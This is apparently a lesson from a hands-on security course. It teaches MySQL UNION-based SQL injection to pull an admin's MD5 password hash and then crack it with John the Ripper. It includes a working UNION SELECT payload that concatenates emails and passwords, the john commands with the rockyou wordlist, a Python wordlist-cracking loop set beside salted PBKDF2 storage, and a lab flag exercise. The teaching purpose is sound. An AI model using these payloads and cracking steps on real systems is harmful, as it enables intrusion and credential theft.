SQL Injection

(MySQL) UNION and breaking password hashes

Medium
45 min

Hash algorithms

Fortunately, it is now quite rare that applications store users' passwords in plain text in a database. In such a case, an attacker who manages to steal the database would have a bunch of passwords to try, for example, in users' accounts on other services (which is why passwords should not be reused).

Instead, passwords are usually "hashed", meaning they are run through a one-way hashing algorithm, such as MD5, SHA1, etc.

For example, the MD5 hash of the text "kissa123" is 13c3a117d0013ab22417c8edca354b76. The application could then store it in the user database as follows:

Email: jaska.jokunen@example.com

PasswordHash: 13c3a117d0013ab22417c8edca354b76

When Jaska Jokunen logs in, the application verifies if MD5(Jaska's entered password) is equal to the password hash saved in the database.

An attacker, on the other hand, cannot directly change the hash 13c3a117d0013ab22417c8edca354b76 back to the form "kissa123". Hash algorithms are one-way.

However, an attacker can guess with brute force and wordlists.

  • Is 13c3a117d0013ab22417c8edca354b76 the hash of "pokemon"? No.
  • Is 13c3a117d0013ab22417c8edca354b76 the hash of "kitara456"? No.
  • Is 13c3a117d0013ab22417c8edca354b76 the hash of "kissa123"? Yes.

This kind of guessing is usually called password cracking.
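The login check and the guessing loop described above, as an added example that is not part of the original lesson, alongside the salted slow hash that defends against it. The wordlist and passwords are constructed here; the stored hash is recomputed from the constructed password rather than copied from the page.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Constructed wordlist for this example (a real cracking run would use
# a list such as rockyou.txt).
WORDLIST = ["pokemon", "kitara456", "football1", "kissa123", "summer1"]


def md5_hex(password: str) -> str:
    """Unsalted MD5, as the lesson's application stores passwords."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def verify_md5(password: str, stored_hash: str) -> bool:
    """The login check: MD5(entered password) == stored hash."""
    return hmac.compare_digest(md5_hex(password), stored_hash)


def crack_md5(stored_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """The guessing loop: hash each candidate and compare, as john does."""
    for candidate in wordlist:
        if verify_md5(candidate, stored_hash):
            return candidate
    return None


# Defensive contrast: a per-user salt plus a deliberately slow KDF. The same
# wordlist loop still applies in principle, but every guess now costs
# ITERATIONS hash computations, and the random salt means identical
# passwords produce different stored values, so one guess checks one user.
# OWASP's 2023 guidance is 600,000 iterations for PBKDF2-HMAC-SHA256; the
# count is kept lower here only so the example runs quickly.
ITERATIONS = 100_000


def pbkdf2_store(password: str, salt: Optional[bytes] = None) -> str:
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    target = md5_hex("kissa123")
    print("MD5 cracked:", crack_md5(target, WORDLIST))
    print("PBKDF2 salted record:", pbkdf2_store("kissa123"))
```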

Obtaining the password hash of an admin user

Use the good old SQL injection vulnerability in the credit card search to retrieve the admin user's password hash. The steps are exactly the same as in the task where you retrieved the system administrator's password, except that the password was stored in plain text at that time. Here are the steps to refresh your memory (all of these have been covered earlier in the course):

  • Escape from the LIKE clause text and comment out the rest of the query with double dash (and space) so that the query goes through again.
  • After the query, add ORDER BY 1, ORDER BY 2, etc. until you determine the number of columns returned by the query.
  • Add the UNION SELECT statement with the correct number of columns. First try with NULL values and then try to find a column that is reflected in the application, i.e., a reflection point.
  • Use UNION SELECT to retrieve the email and password columns from the user table. Filter the rows to only those where the value in the admin column is True.

For variation, you can return both the username and password hash together in one column, using the MySQL concat function.

Example:

UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,concat(email, ":", password),NULL FROM user WHERE admin=True

Breaking the seal

Use the John The Ripper (JTR) tool to crack the MD5 hash. Open the attacker's terminal and copy the admin user's hash into a text file named hash.txt. For example, like this:

Next, run JTR (john) with the following settings:

  • Hash algorithm (--format): raw-md5
  • Password list used for guessing (--wordlist): /usr/share/wordlists/rockyou.txt
  • File containing the hash: hash.txt

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

The output should be something like this; in this case, the password was "tucker".

Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
tucker           (?)
1g 0:00:00:00 DONE (2021-07-01 07:12) 100.0g/s 115200p/s 115200c/s 115200C/s football1..summer1

You can also run the john --show command:

john --show --format=raw-md5 hash.txt

The command should output the password.

?:tucker

1 password hash cracked, 0 left

Log in with the previously provided email and compromised password to complete the exercise.

MySQLI - Cracking password hashes

In this lab, passwords are protected with a hashing algorithm, so you can crack them with the JTR (John the Ripper) tool.

Objective

Login as admin user.

Exercises

Flag

Find the flag from the lab environment and enter it below.
